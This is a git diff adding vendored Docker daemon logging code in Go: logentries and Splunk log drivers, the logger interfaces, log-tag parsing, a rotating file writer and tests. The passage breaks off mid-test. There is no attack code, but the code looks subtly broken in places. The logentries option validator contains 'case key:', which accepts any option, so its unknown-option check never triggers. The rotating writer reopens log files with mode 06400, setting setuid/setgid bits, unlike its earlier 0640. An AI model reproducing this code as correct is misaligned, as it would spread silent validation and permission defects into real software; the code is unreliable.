a/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go b/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go new file mode 100644 index 0000000000..e794b1ed08 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/logentries/logentries.go @@ -0,0 +1,94 @@ +// Package logentries provides the log driver for forwarding server logs +// to logentries endpoints. +package logentries + +import ( + "fmt" + + "github.com/Sirupsen/logrus" + "github.com/bsphere/le_go" + "github.com/docker/docker/daemon/logger" +) + +type logentries struct { + tag string + containerID string + containerName string + writer *le_go.Logger + extra map[string]string +} + +const ( + name = "logentries" + token = "logentries-token" +) + +func init() { + if err := logger.RegisterLogDriver(name, New); err != nil { + logrus.Fatal(err) + } + if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil { + logrus.Fatal(err) + } +} + +// New creates a logentries logger using the configuration passed in on +// the context. The supported context configuration variable is +// logentries-token. +func New(ctx logger.Context) (logger.Logger, error) { + logrus.WithField("container", ctx.ContainerID). + WithField("token", ctx.Config[token]). + Debug("logging driver logentries configured") + + log, err := le_go.Connect(ctx.Config[token]) + if err != nil { + return nil, err + } + return &logentries{ + containerID: ctx.ContainerID, + containerName: ctx.ContainerName, + writer: log, + }, nil +} + +func (f *logentries) Log(msg *logger.Message) error { + data := map[string]string{ + "container_id": f.containerID, + "container_name": f.containerName, + "source": msg.Source, + "log": string(msg.Line), + } + for k, v := range f.extra { + data[k] = v + } + f.writer.Println(f.tag, msg.Timestamp, data) + return nil +} + +func (f *logentries) Close() error { + return f.writer.Close() +} + +func (f *logentries) Name() string { + return name +} + +// ValidateLogOpt looks for logentries specific log option logentries-address. +func ValidateLogOpt(cfg map[string]string) error { + for key := range cfg { + switch key { + case "env": + case "labels": + case "tag": + case key: + default: + return fmt.Errorf("unknown log opt '%s' for logentries log driver", key) + } + } + + if cfg[token] == "" { + return fmt.Errorf("Missing logentries token") + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/logger.go b/vendor/github.com/docker/docker/daemon/logger/logger.go new file mode 100644 index 0000000000..d091997358 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/logger.go @@ -0,0 +1,134 @@ +// Package logger defines interfaces that logger drivers implement to +// log messages. +// +// The other half of a logger driver is the implementation of the +// factory, which holds the contextual instance information that +// allows multiple loggers of the same type to perform different +// actions, such as logging to different locations. +package logger + +import ( + "errors" + "sort" + "strings" + "sync" + "time" + + "github.com/docker/docker/pkg/jsonlog" +) + +// ErrReadLogsNotSupported is returned when the logger does not support reading logs. +var ErrReadLogsNotSupported = errors.New("configured logging reader does not support reading") + +const ( + // TimeFormat is the time format used for timestamps sent to log readers. + TimeFormat = jsonlog.RFC3339NanoFixed + logWatcherBufferSize = 4096 +) + +// Message is datastructure that represents piece of output produced by some +// container. The Line member is a slice of an array whose contents can be +// changed after a log driver's Log() method returns. +type Message struct { + Line []byte + Source string + Timestamp time.Time + Attrs LogAttributes + Partial bool +} + +// CopyMessage creates a copy of the passed-in Message which will remain +// unchanged if the original is changed. Log drivers which buffer Messages +// rather than dispatching them during their Log() method should use this +// function to obtain a Message whose Line member's contents won't change. +func CopyMessage(msg *Message) *Message { + m := new(Message) + m.Line = make([]byte, len(msg.Line)) + copy(m.Line, msg.Line) + m.Source = msg.Source + m.Timestamp = msg.Timestamp + m.Partial = msg.Partial + m.Attrs = make(LogAttributes) + for k, v := range msg.Attrs { + m.Attrs[k] = v + } + return m +} + +// LogAttributes is used to hold the extra attributes available in the log message +// Primarily used for converting the map type to string and sorting. +type LogAttributes map[string]string +type byKey []string + +func (s byKey) Len() int { return len(s) } +func (s byKey) Less(i, j int) bool { + keyI := strings.Split(s[i], "=") + keyJ := strings.Split(s[j], "=") + return keyI[0] < keyJ[0] +} +func (s byKey) Swap(i, j int) { + s[i], s[j] = s[j], s[i] +} + +func (a LogAttributes) String() string { + var ss byKey + for k, v := range a { + ss = append(ss, k+"="+v) + } + sort.Sort(ss) + return strings.Join(ss, ",") +} + +// Logger is the interface for docker logging drivers. +type Logger interface { + Log(*Message) error + Name() string + Close() error +} + +// ReadConfig is the configuration passed into ReadLogs. +type ReadConfig struct { + Since time.Time + Tail int + Follow bool +} + +// LogReader is the interface for reading log messages for loggers that support reading. +type LogReader interface { + // Read logs from underlying logging backend + ReadLogs(ReadConfig) *LogWatcher +} + +// LogWatcher is used when consuming logs read from the LogReader interface. +type LogWatcher struct { + // For sending log messages to a reader. + Msg chan *Message + // For sending error messages that occur while while reading logs. + Err chan error + closeOnce sync.Once + closeNotifier chan struct{} +} + +// NewLogWatcher returns a new LogWatcher. +func NewLogWatcher() *LogWatcher { + return &LogWatcher{ + Msg: make(chan *Message, logWatcherBufferSize), + Err: make(chan error, 1), + closeNotifier: make(chan struct{}), + } +} + +// Close notifies the underlying log reader to stop. +func (w *LogWatcher) Close() { + // only close if not already closed + w.closeOnce.Do(func() { + close(w.closeNotifier) + }) +} + +// WatchClose returns a channel receiver that receives notification +// when the watcher has been closed. This should only be called from +// one goroutine. +func (w *LogWatcher) WatchClose() <-chan struct{} { + return w.closeNotifier +} diff --git a/vendor/github.com/docker/docker/daemon/logger/logger_test.go b/vendor/github.com/docker/docker/daemon/logger/logger_test.go new file mode 100644 index 0000000000..16e1514d2d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/logger_test.go @@ -0,0 +1,26 @@ +package logger + +import ( + "reflect" + "testing" + "time" +) + +func TestCopyMessage(t *testing.T) { + msg := &Message{ + Line: []byte("test line."), + Source: "stdout", + Timestamp: time.Now(), + Attrs: LogAttributes{ + "key1": "val1", + "key2": "val2", + "key3": "val3", + }, + Partial: true, + } + + m := CopyMessage(msg) + if !reflect.DeepEqual(m, msg) { + t.Fatalf("CopyMessage failed to copy message") + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go new file mode 100644 index 0000000000..4752679c72 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag.go @@ -0,0 +1,31 @@ +package loggerutils + +import ( + "bytes" + + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/utils/templates" +) + +// DefaultTemplate defines the defaults template logger should use. +const DefaultTemplate = "{{.ID}}" + +// ParseLogTag generates a context aware tag for consistency across different +// log drivers based on the context of the running container. +func ParseLogTag(ctx logger.Context, defaultTemplate string) (string, error) { + tagTemplate := ctx.Config["tag"] + if tagTemplate == "" { + tagTemplate = defaultTemplate + } + + tmpl, err := templates.NewParse("log-tag", tagTemplate) + if err != nil { + return "", err + } + buf := new(bytes.Buffer) + if err := tmpl.Execute(buf, &ctx); err != nil { + return "", err + } + + return buf.String(), nil +} diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go new file mode 100644 index 0000000000..e2aa4358aa --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/log_tag_test.go @@ -0,0 +1,47 @@ +package loggerutils + +import ( + "testing" + + "github.com/docker/docker/daemon/logger" +) + +func TestParseLogTagDefaultTag(t *testing.T) { + ctx := buildContext(map[string]string{}) + tag, e := ParseLogTag(ctx, "{{.ID}}") + assertTag(t, e, tag, ctx.ID()) +} + +func TestParseLogTag(t *testing.T) { + ctx := buildContext(map[string]string{"tag": "{{.ImageName}}/{{.Name}}/{{.ID}}"}) + tag, e := ParseLogTag(ctx, "{{.ID}}") + assertTag(t, e, tag, "test-image/test-container/container-ab") +} + +func TestParseLogTagEmptyTag(t *testing.T) { + ctx := buildContext(map[string]string{}) + tag, e := ParseLogTag(ctx, "{{.DaemonName}}/{{.ID}}") + assertTag(t, e, tag, "test-dockerd/container-ab") +} + +// Helpers + +func buildContext(cfg map[string]string) logger.Context { + return logger.Context{ + ContainerID: "container-abcdefghijklmnopqrstuvwxyz01234567890", + ContainerName: "/test-container", + ContainerImageID: "image-abcdefghijklmnopqrstuvwxyz01234567890", + ContainerImageName: "test-image", + Config: cfg, + DaemonName: "test-dockerd", + } +} + +func assertTag(t *testing.T, e error, tag string, expected string) { + if e != nil { + t.Fatalf("Error generating tag: %q", e) + } + if tag != expected { + t.Fatalf("Wrong tag: %q, should be %q", tag, expected) + } +} diff --git a/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go b/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go new file mode 100644 index 0000000000..99e0964aea --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/loggerutils/rotatefilewriter.go @@ -0,0 +1,124 @@ +package loggerutils + +import ( + "os" + "strconv" + "sync" + + "github.com/docker/docker/pkg/pubsub" +) + +// RotateFileWriter is Logger implementation for default Docker logging. +type RotateFileWriter struct { + f *os.File // store for closing + mu sync.Mutex + capacity int64 //maximum size of each file + currentSize int64 // current size of the latest file + maxFiles int //maximum number of files + notifyRotate *pubsub.Publisher +} + +//NewRotateFileWriter creates new RotateFileWriter +func NewRotateFileWriter(logPath string, capacity int64, maxFiles int) (*RotateFileWriter, error) { + log, err := os.OpenFile(logPath, os.O_WRONLY|os.O_APPEND|os.O_CREATE, 0640) + if err != nil { + return nil, err + } + + size, err := log.Seek(0, os.SEEK_END) + if err != nil { + return nil, err + } + + return &RotateFileWriter{ + f: log, + capacity: capacity, + currentSize: size, + maxFiles: maxFiles, + notifyRotate: pubsub.NewPublisher(0, 1), + }, nil +} + +//WriteLog write log message to File +func (w *RotateFileWriter) Write(message []byte) (int, error) { + w.mu.Lock() + if err := w.checkCapacityAndRotate(); err != nil { + w.mu.Unlock() + return -1, err + } + + n, err := w.f.Write(message) + if err == nil { + w.currentSize += int64(n) + } + w.mu.Unlock() + return n, err +} + +func (w *RotateFileWriter) checkCapacityAndRotate() error { + if w.capacity == -1 { + return nil + } + + if w.currentSize >= w.capacity { + name := w.f.Name() + if err := w.f.Close(); err != nil { + return err + } + if err := rotate(name, w.maxFiles); err != nil { + return err + } + file, err := os.OpenFile(name, os.O_WRONLY|os.O_TRUNC|os.O_CREATE, 06400) + if err != nil { + return err + } + w.f = file + w.currentSize = 0 + w.notifyRotate.Publish(struct{}{}) + } + + return nil +} + +func rotate(name string, maxFiles int) error { + if maxFiles < 2 { + return nil + } + for i := maxFiles - 1; i > 1; i-- { + toPath := name + "." + strconv.Itoa(i) + fromPath := name + "." + strconv.Itoa(i-1) + if err := os.Rename(fromPath, toPath); err != nil && !os.IsNotExist(err) { + return err + } + } + + if err := os.Rename(name, name+".1"); err != nil && !os.IsNotExist(err) { + return err + } + return nil +} + +// LogPath returns the location the given writer logs to. +func (w *RotateFileWriter) LogPath() string { + return w.f.Name() +} + +// MaxFiles return maximum number of files +func (w *RotateFileWriter) MaxFiles() int { + return w.maxFiles +} + +//NotifyRotate returns the new subscriber +func (w *RotateFileWriter) NotifyRotate() chan interface{} { + return w.notifyRotate.Subscribe() +} + +//NotifyRotateEvict removes the specified subscriber from receiving any more messages. +func (w *RotateFileWriter) NotifyRotateEvict(sub chan interface{}) { + w.notifyRotate.Evict(sub) +} + +// Close closes underlying file and signals all readers to stop. +func (w *RotateFileWriter) Close() error { + return w.f.Close() +} diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go new file mode 100644 index 0000000000..f85832681a --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk.go @@ -0,0 +1,621 @@ +// Package splunk provides the log driver for forwarding server logs to +// Splunk HTTP Event Collector endpoint. +package splunk + +import ( + "bytes" + "compress/gzip" + "crypto/tls" + "crypto/x509" + "encoding/json" + "fmt" + "io" + "io/ioutil" + "net/http" + "net/url" + "os" + "strconv" + "sync" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/logger" + "github.com/docker/docker/daemon/logger/loggerutils" + "github.com/docker/docker/pkg/urlutil" +) + +const ( + driverName = "splunk" + splunkURLKey = "splunk-url" + splunkTokenKey = "splunk-token" + splunkSourceKey = "splunk-source" + splunkSourceTypeKey = "splunk-sourcetype" + splunkIndexKey = "splunk-index" + splunkCAPathKey = "splunk-capath" + splunkCANameKey = "splunk-caname" + splunkInsecureSkipVerifyKey = "splunk-insecureskipverify" + splunkFormatKey = "splunk-format" + splunkVerifyConnectionKey = "splunk-verify-connection" + splunkGzipCompressionKey = "splunk-gzip" + splunkGzipCompressionLevelKey = "splunk-gzip-level" + envKey = "env" + labelsKey = "labels" + tagKey = "tag" +) + +const ( + // How often do we send messages (if we are not reaching batch size) + defaultPostMessagesFrequency = 5 * time.Second + // How big can be batch of messages + defaultPostMessagesBatchSize = 1000 + // Maximum number of messages we can store in buffer + defaultBufferMaximum = 10 * defaultPostMessagesBatchSize + // Number of messages allowed to be queued in the channel + defaultStreamChannelSize = 4 * defaultPostMessagesBatchSize +) + +const ( + envVarPostMessagesFrequency = "SPLUNK_LOGGING_DRIVER_POST_MESSAGES_FREQUENCY" + envVarPostMessagesBatchSize = "SPLUNK_LOGGING_DRIVER_POST_MESSAGES_BATCH_SIZE" + envVarBufferMaximum = "SPLUNK_LOGGING_DRIVER_BUFFER_MAX" + envVarStreamChannelSize = "SPLUNK_LOGGING_DRIVER_CHANNEL_SIZE" +) + +type splunkLoggerInterface interface { + logger.Logger + worker() +} + +type splunkLogger struct { + client *http.Client + transport *http.Transport + + url string + auth string + nullMessage *splunkMessage + + // http compression + gzipCompression bool + gzipCompressionLevel int + + // Advanced options + postMessagesFrequency time.Duration + postMessagesBatchSize int + bufferMaximum int + + // For synchronization between background worker and logger. + // We use channel to send messages to worker go routine. + // All other variables for blocking Close call before we flush all messages to HEC + stream chan *splunkMessage + lock sync.RWMutex + closed bool + closedCond *sync.Cond +} + +type splunkLoggerInline struct { + *splunkLogger + + nullEvent *splunkMessageEvent +} + +type splunkLoggerJSON struct { + *splunkLoggerInline +} + +type splunkLoggerRaw struct { + *splunkLogger + + prefix []byte +} + +type splunkMessage struct { + Event interface{} `json:"event"` + Time string `json:"time"` + Host string `json:"host"` + Source string `json:"source,omitempty"` + SourceType string `json:"sourcetype,omitempty"` + Index string `json:"index,omitempty"` +} + +type splunkMessageEvent struct { + Line interface{} `json:"line"` + Source string `json:"source"` + Tag string `json:"tag,omitempty"` + Attrs map[string]string `json:"attrs,omitempty"` +} + +const ( + splunkFormatRaw = "raw" + splunkFormatJSON = "json" + splunkFormatInline = "inline" +) + +func init() { + if err := logger.RegisterLogDriver(driverName, New); err != nil { + logrus.Fatal(err) + } + if err := logger.RegisterLogOptValidator(driverName, ValidateLogOpt); err != nil { + logrus.Fatal(err) + } +} + +// New creates splunk logger driver using configuration passed in context +func New(ctx logger.Context) (logger.Logger, error) { + hostname, err := ctx.Hostname() + if err != nil { + return nil, fmt.Errorf("%s: cannot access hostname to set source field", driverName) + } + + // Parse and validate Splunk URL + splunkURL, err := parseURL(ctx) + if err != nil { + return nil, err + } + + // Splunk Token is required parameter + splunkToken, ok := ctx.Config[splunkTokenKey] + if !ok { + return nil, fmt.Errorf("%s: %s is expected", driverName, splunkTokenKey) + } + + tlsConfig := &tls.Config{} + + // Splunk is using autogenerated certificates by default, + // allow users to trust them with skipping verification + if insecureSkipVerifyStr, ok := ctx.Config[splunkInsecureSkipVerifyKey]; ok { + insecureSkipVerify, err := strconv.ParseBool(insecureSkipVerifyStr) + if err != nil { + return nil, err + } + tlsConfig.InsecureSkipVerify = insecureSkipVerify + } + + // If path to the root certificate is provided - load it + if caPath, ok := ctx.Config[splunkCAPathKey]; ok { + caCert, err := ioutil.ReadFile(caPath) + if err != nil { + return nil, err + } + caPool := x509.NewCertPool() + caPool.AppendCertsFromPEM(caCert) + tlsConfig.RootCAs = caPool + } + + if caName, ok := ctx.Config[splunkCANameKey]; ok { + tlsConfig.ServerName = caName + } + + gzipCompression := false + if gzipCompressionStr, ok := ctx.Config[splunkGzipCompressionKey]; ok { + gzipCompression, err = strconv.ParseBool(gzipCompressionStr) + if err != nil { + return nil, err + } + } + + gzipCompressionLevel := gzip.DefaultCompression + if gzipCompressionLevelStr, ok := ctx.Config[splunkGzipCompressionLevelKey]; ok { + var err error + gzipCompressionLevel64, err := strconv.ParseInt(gzipCompressionLevelStr, 10, 32) + if err != nil { + return nil, err + } + gzipCompressionLevel = int(gzipCompressionLevel64) + if gzipCompressionLevel < gzip.DefaultCompression || gzipCompressionLevel > gzip.BestCompression { + err := fmt.Errorf("Not supported level '%s' for %s (supported values between %d and %d).", + gzipCompressionLevelStr, splunkGzipCompressionLevelKey, gzip.DefaultCompression, gzip.BestCompression) + return nil, err + } + } + + transport := &http.Transport{ + TLSClientConfig: tlsConfig, + } + client := &http.Client{ + Transport: transport, + } + + source := ctx.Config[splunkSourceKey] + sourceType := ctx.Config[splunkSourceTypeKey] + index := ctx.Config[splunkIndexKey] + + var nullMessage = &splunkMessage{ + Host: hostname, + Source: source, + SourceType: sourceType, + Index: index, + } + + // Allow user to remove tag from the messages by setting tag to empty string + tag := "" + if tagTemplate, ok := ctx.Config[tagKey]; !ok || tagTemplate != "" { + tag, err = loggerutils.ParseLogTag(ctx, loggerutils.DefaultTemplate) + if err != nil { + return nil, err + } + } + + attrs := ctx.ExtraAttributes(nil) + + var ( + postMessagesFrequency = getAdvancedOptionDuration(envVarPostMessagesFrequency, defaultPostMessagesFrequency) + postMessagesBatchSize = getAdvancedOptionInt(envVarPostMessagesBatchSize, defaultPostMessagesBatchSize) + bufferMaximum = getAdvancedOptionInt(envVarBufferMaximum, defaultBufferMaximum) + streamChannelSize = getAdvancedOptionInt(envVarStreamChannelSize, defaultStreamChannelSize) + ) + + logger := &splunkLogger{ + client: client, + transport: transport, + url: splunkURL.String(), + auth: "Splunk " + splunkToken, + nullMessage: nullMessage, + gzipCompression: gzipCompression, + gzipCompressionLevel: gzipCompressionLevel, + stream: make(chan *splunkMessage, streamChannelSize), + postMessagesFrequency: postMessagesFrequency, + postMessagesBatchSize: postMessagesBatchSize, + bufferMaximum: bufferMaximum, + } + + // By default we verify connection, but we allow use to skip that + verifyConnection := true + if verifyConnectionStr, ok := ctx.Config[splunkVerifyConnectionKey]; ok { + var err error + verifyConnection, err = strconv.ParseBool(verifyConnectionStr) + if err != nil { + return nil, err + } + } + if verifyConnection { + err = verifySplunkConnection(logger) + if err != nil { + return nil, err + } + } + + var splunkFormat string + if splunkFormatParsed, ok := ctx.Config[splunkFormatKey]; ok { + switch splunkFormatParsed { + case splunkFormatInline: + case splunkFormatJSON: + case splunkFormatRaw: + default: + return nil, fmt.Errorf("Unknown format specified %s, supported formats are inline, json and raw", splunkFormat) + } + splunkFormat = splunkFormatParsed + } else { + splunkFormat = splunkFormatInline + } + + var loggerWrapper splunkLoggerInterface + + switch splunkFormat { + case splunkFormatInline: + nullEvent := &splunkMessageEvent{ + Tag: tag, + Attrs: attrs, + } + + loggerWrapper = &splunkLoggerInline{logger, nullEvent} + case splunkFormatJSON: + nullEvent := &splunkMessageEvent{ + Tag: tag, + Attrs: attrs, + } + + loggerWrapper = &splunkLoggerJSON{&splunkLoggerInline{logger, nullEvent}} + case splunkFormatRaw: + var prefix bytes.Buffer + if tag != "" { + prefix.WriteString(tag) + prefix.WriteString(" ") + } + for key, value := range attrs { + prefix.WriteString(key) + prefix.WriteString("=") + prefix.WriteString(value) + prefix.WriteString(" ") + } + + loggerWrapper = &splunkLoggerRaw{logger, prefix.Bytes()} + default: + return nil, fmt.Errorf("Unexpected format %s", splunkFormat) + } + + go loggerWrapper.worker() + + return loggerWrapper, nil +} + +func (l *splunkLoggerInline) Log(msg *logger.Message) error { + message := l.createSplunkMessage(msg) + + event := *l.nullEvent + event.Line = string(msg.Line) + event.Source = msg.Source + + message.Event = &event + + return l.queueMessageAsync(message) +} + +func (l *splunkLoggerJSON) Log(msg *logger.Message) error { + message := l.createSplunkMessage(msg) + event := *l.nullEvent + + var rawJSONMessage json.RawMessage + if err := json.Unmarshal(msg.Line, &rawJSONMessage); err == nil { + event.Line = &rawJSONMessage + } else { + event.Line = string(msg.Line) + } + + event.Source = msg.Source + + message.Event = &event + + return l.queueMessageAsync(message) +} + +func (l *splunkLoggerRaw) Log(msg *logger.Message) error { + message := l.createSplunkMessage(msg) + + message.Event = string(append(l.prefix, msg.Line...)) + + return l.queueMessageAsync(message) +} + +func (l *splunkLogger) queueMessageAsync(message *splunkMessage) error { + l.lock.RLock() + defer l.lock.RUnlock() + if l.closedCond != nil { + return fmt.Errorf("%s: driver is closed", driverName) + } + l.stream <- message + return nil +} + +func (l *splunkLogger) worker() { + timer := time.NewTicker(l.postMessagesFrequency) + var messages []*splunkMessage + for { + select { + case message, open := <-l.stream: + if !open { + l.postMessages(messages, true) + l.lock.Lock() + defer l.lock.Unlock() + l.transport.CloseIdleConnections() + l.closed = true + l.closedCond.Signal() + return + } + messages = append(messages, message) + // Only sending when we get exactly to the batch size, + // This also helps not to fire postMessages on every new message, + // when previous try failed. + if len(messages)%l.postMessagesBatchSize == 0 { + messages = l.postMessages(messages, false) + } + case <-timer.C: + messages = l.postMessages(messages, false) + } + } +} + +func (l *splunkLogger) postMessages(messages []*splunkMessage, lastChance bool) []*splunkMessage { + messagesLen := len(messages) + for i := 0; i < messagesLen; i += l.postMessagesBatchSize { + upperBound := i + l.postMessagesBatchSize + if upperBound > messagesLen { + upperBound = messagesLen + } + if err := l.tryPostMessages(messages[i:upperBound]); err != nil { + logrus.Error(err) + if messagesLen-i >= l.bufferMaximum || lastChance { + // If this is last chance - print them all to the daemon log + if lastChance { + upperBound = messagesLen + } + // Not all sent, but buffer has got to its maximum, let's log all messages + // we could not send and return buffer minus one batch size + for j := i; j < upperBound; j++ { + if jsonEvent, err := json.Marshal(messages[j]); err != nil { + logrus.Error(err) + } else { + logrus.Error(fmt.Errorf("Failed to send a message '%s'", string(jsonEvent))) + } + } + return messages[upperBound:messagesLen] + } + // Not all sent, returning buffer from where we have not sent messages + return messages[i:messagesLen] + } + } + // All sent, return empty buffer + return messages[:0] +} + +func (l *splunkLogger) tryPostMessages(messages []*splunkMessage) error { + if len(messages) == 0 { + return nil + } + var buffer bytes.Buffer + var writer io.Writer + var gzipWriter *gzip.Writer + var err error + // If gzip compression is enabled - create gzip writer with specified compression + // level. If gzip compression is disabled, use standard buffer as a writer + if l.gzipCompression { + gzipWriter, err = gzip.NewWriterLevel(&buffer, l.gzipCompressionLevel) + if err != nil { + return err + } + writer = gzipWriter + } else { + writer = &buffer + } + for _, message := range messages { + jsonEvent, err := json.Marshal(message) + if err != nil { + return err + } + if _, err := writer.Write(jsonEvent); err != nil { + return err + } + } + // If gzip compression is enabled, tell it, that we are done + if l.gzipCompression { + err = gzipWriter.Close() + if err != nil { + return err + } + } + req, err := http.NewRequest("POST", l.url, bytes.NewBuffer(buffer.Bytes())) + if err != nil { + return err + } + req.Header.Set("Authorization", l.auth) + // Tell if we are sending gzip compressed body + if l.gzipCompression { + req.Header.Set("Content-Encoding", "gzip") + } + res, err := l.client.Do(req) + if err != nil { + return err + } + defer res.Body.Close() + if res.StatusCode != http.StatusOK { + var body []byte + body, err = ioutil.ReadAll(res.Body) + if err != nil { + return err + } + return fmt.Errorf("%s: failed to send event - %s - %s", driverName, res.Status, body) + } + io.Copy(ioutil.Discard, res.Body) + return nil +} + +func (l *splunkLogger) Close() error { + l.lock.Lock() + defer l.lock.Unlock() + if l.closedCond == nil { + l.closedCond = sync.NewCond(&l.lock) + close(l.stream) + for !l.closed { + l.closedCond.Wait() + } + } + return nil +} + +func (l *splunkLogger) Name() string { + return driverName +} + +func (l *splunkLogger) createSplunkMessage(msg *logger.Message) *splunkMessage { + message := *l.nullMessage + message.Time = fmt.Sprintf("%f", float64(msg.Timestamp.UnixNano())/float64(time.Second)) + return &message +} + +// ValidateLogOpt looks for all supported by splunk driver options +func ValidateLogOpt(cfg map[string]string) error { + for key := range cfg { + switch key { + case splunkURLKey: + case splunkTokenKey: + case splunkSourceKey: + case splunkSourceTypeKey: + case splunkIndexKey: + case splunkCAPathKey: + case splunkCANameKey: + case splunkInsecureSkipVerifyKey: + case splunkFormatKey: + case splunkVerifyConnectionKey: + case splunkGzipCompressionKey: + case splunkGzipCompressionLevelKey: + case envKey: + case labelsKey: + case tagKey: + default: + return fmt.Errorf("unknown log opt '%s' for %s log driver", key, driverName) + } + } + return nil +} + +func parseURL(ctx logger.Context) (*url.URL, error) { + splunkURLStr, ok := ctx.Config[splunkURLKey] + if !ok { + return nil, fmt.Errorf("%s: %s is expected", driverName, splunkURLKey) + } + + splunkURL, err := url.Parse(splunkURLStr) + if err != nil { + return nil, fmt.Errorf("%s: failed to parse %s as url value in %s", driverName, splunkURLStr, splunkURLKey) + } + + if !urlutil.IsURL(splunkURLStr) || + !splunkURL.IsAbs() || + (splunkURL.Path != "" && splunkURL.Path != "/") || + splunkURL.RawQuery != "" || + splunkURL.Fragment != "" { + return nil, fmt.Errorf("%s: expected format scheme://dns_name_or_ip:port for %s", driverName, splunkURLKey) + } + + splunkURL.Path = "/services/collector/event/1.0" + + return splunkURL, nil +} + +func verifySplunkConnection(l *splunkLogger) error { + req, err := http.NewRequest(http.MethodOptions, l.url, nil) + if err != nil { + return err + } + res, err := l.client.Do(req) + if err != nil { + return err + } + if res.Body != nil { + defer res.Body.Close() + } + if res.StatusCode != http.StatusOK { + var body []byte + body, err = ioutil.ReadAll(res.Body) + if err != nil { + return err + } + return fmt.Errorf("%s: failed to verify connection - %s - %s", driverName, res.Status, body) + } + return nil +} + +func getAdvancedOptionDuration(envName string, defaultValue time.Duration) time.Duration { + valueStr := os.Getenv(envName) + if valueStr == "" { + return defaultValue + } + parsedValue, err := time.ParseDuration(valueStr) + if err != nil { + logrus.Error(fmt.Sprintf("Failed to parse value of %s as duration. Using default %v. %v", envName, defaultValue, err)) + return defaultValue + } + return parsedValue +} + +func getAdvancedOptionInt(envName string, defaultValue int) int { + valueStr := os.Getenv(envName) + if valueStr == "" { + return defaultValue + } + parsedValue, err := strconv.ParseInt(valueStr, 10, 32) + if err != nil { + logrus.Error(fmt.Sprintf("Failed to parse value of %s as integer. Using default %d. %v", envName, defaultValue, err)) + return defaultValue + } + return int(parsedValue) +} diff --git a/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go new file mode 100644 index 0000000000..df74cbad5f --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/logger/splunk/splunk_test.go @@ -0,0 +1,1302 @@ +package splunk + +import ( + "compress/gzip" + "fmt" + "os" + "testing" + "time" + + "github.com/docker/docker/daemon/logger" +) + +// Validate options +func TestValidateLogOpt(t *testing.T) { + err := ValidateLogOpt(map[string]string{ + splunkURLKey: "http://127.0.0.1", + splunkTokenKey: "2160C7EF-2CE9-4307-A180-F852B99CF417", + splunkSourceKey: "mysource", + splunkSourceTypeKey: "mysourcetype", + splunkIndexKey: "myindex", + splunkCAPathKey: "/usr/cert.pem", + splunkCANameKey: "ca_name", + splunkInsecureSkipVerifyKey: "true", + splunkFormatKey: "json", + splunkVerifyConnectionKey: "true", + splunkGzipCompressionKey: "true", + splunkGzipCompressionLevelKey: "1", + envKey: "a", + labelsKey: "b", + tagKey: "c", + }) + if err != nil { + t.Fatal(err) + } + + err = ValidateLogOpt(map[string]string{ + "not-supported-option": "a", + }) + if err == nil { + t.Fatal("Expecting error on unsupported options") + } +} + +// Driver require user to specify required options +func TestNewMissedConfig(t *testing.T) { + ctx := logger.Context{ + Config: map[string]string{}, + } + _, err := New(ctx) + if err == nil { + t.Fatal("Logger driver should fail when no required parameters specified") + } +} + +// Driver require user to specify splunk-url +func TestNewMissedUrl(t *testing.T) { + ctx := logger.Context{ + Config: map[string]string{ + splunkTokenKey: "4642492F-D8BD-47F1-A005-0C08AE4657DF", + }, + } + _, err := New(ctx) + if err.Error() != "splunk: splunk-url is expected" { + t.Fatal("Logger driver should fail when no required parameters specified") + } +} + +// Driver require user to specify splunk-token +func TestNewMissedToken(t *testing.T) { + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: "http://127.0.0.1:8088", + }, + } + _, err := New(ctx) + if err.Error() != "splunk: splunk-token is expected" { + t.Fatal("Logger driver should fail when no required parameters specified") + } +} + +// Test default settings +func TestDefault(t *testing.T) { + hec := NewHTTPEventCollectorMock(t) + + go hec.Serve() + + ctx := logger.Context{ + Config: map[string]string{ + splunkURLKey: hec.URL(), + splunkTokenKey: hec.token, + }, + ContainerID: "containeriid", + ContainerName: "container_name", + ContainerImageID: "contaimageid", + ContainerImageName: "container_image_name", + } + + hostname, err := ctx.Hostname() + if err != nil { + t.Fatal(err) + } + + loggerDriver, err := New(ctx) + if err != nil { + t.Fatal(err) + } + + if loggerDriver.Name() != driverName { + t.Fatal("Unexpected logger driver name") + } + + if !hec.connectionVerified { + t.Fatal("By default connection should be verified") + } + + splunkLoggerDriver, ok := loggerDriver.(*splunkLoggerInline) + if !ok { + t.Fatal("Unexpected Splunk Logging Driver type") + } + + if splunkLoggerDriver.url != hec.URL()+"/services/collector/event/1.0" || + splunkLoggerDriver.auth != "Splunk "+hec.token || + splunkLoggerDriver.nullMessage.Host != hostname || + splunkLoggerDriver.nullMessage.Source != "" || + splunkLoggerDriver.nullMessage.SourceType != "" || + splunkLoggerDriver.nullMessage.Index != "" || + splunkLoggerDriver.gzipCompression != false || + splunkLoggerDriver.postMessagesFrequency != defaultPostMessagesFrequency || + splunkLoggerDriver.postMessagesBatchSize != defaultPostMessagesBatchSize || + splunkLoggerDriver.bufferMaximum != defaultBufferMaximum || + cap(splunkLoggerDriver.stream) != defaultStreamChannelSize { + t.Fatal("Found not default values setup in 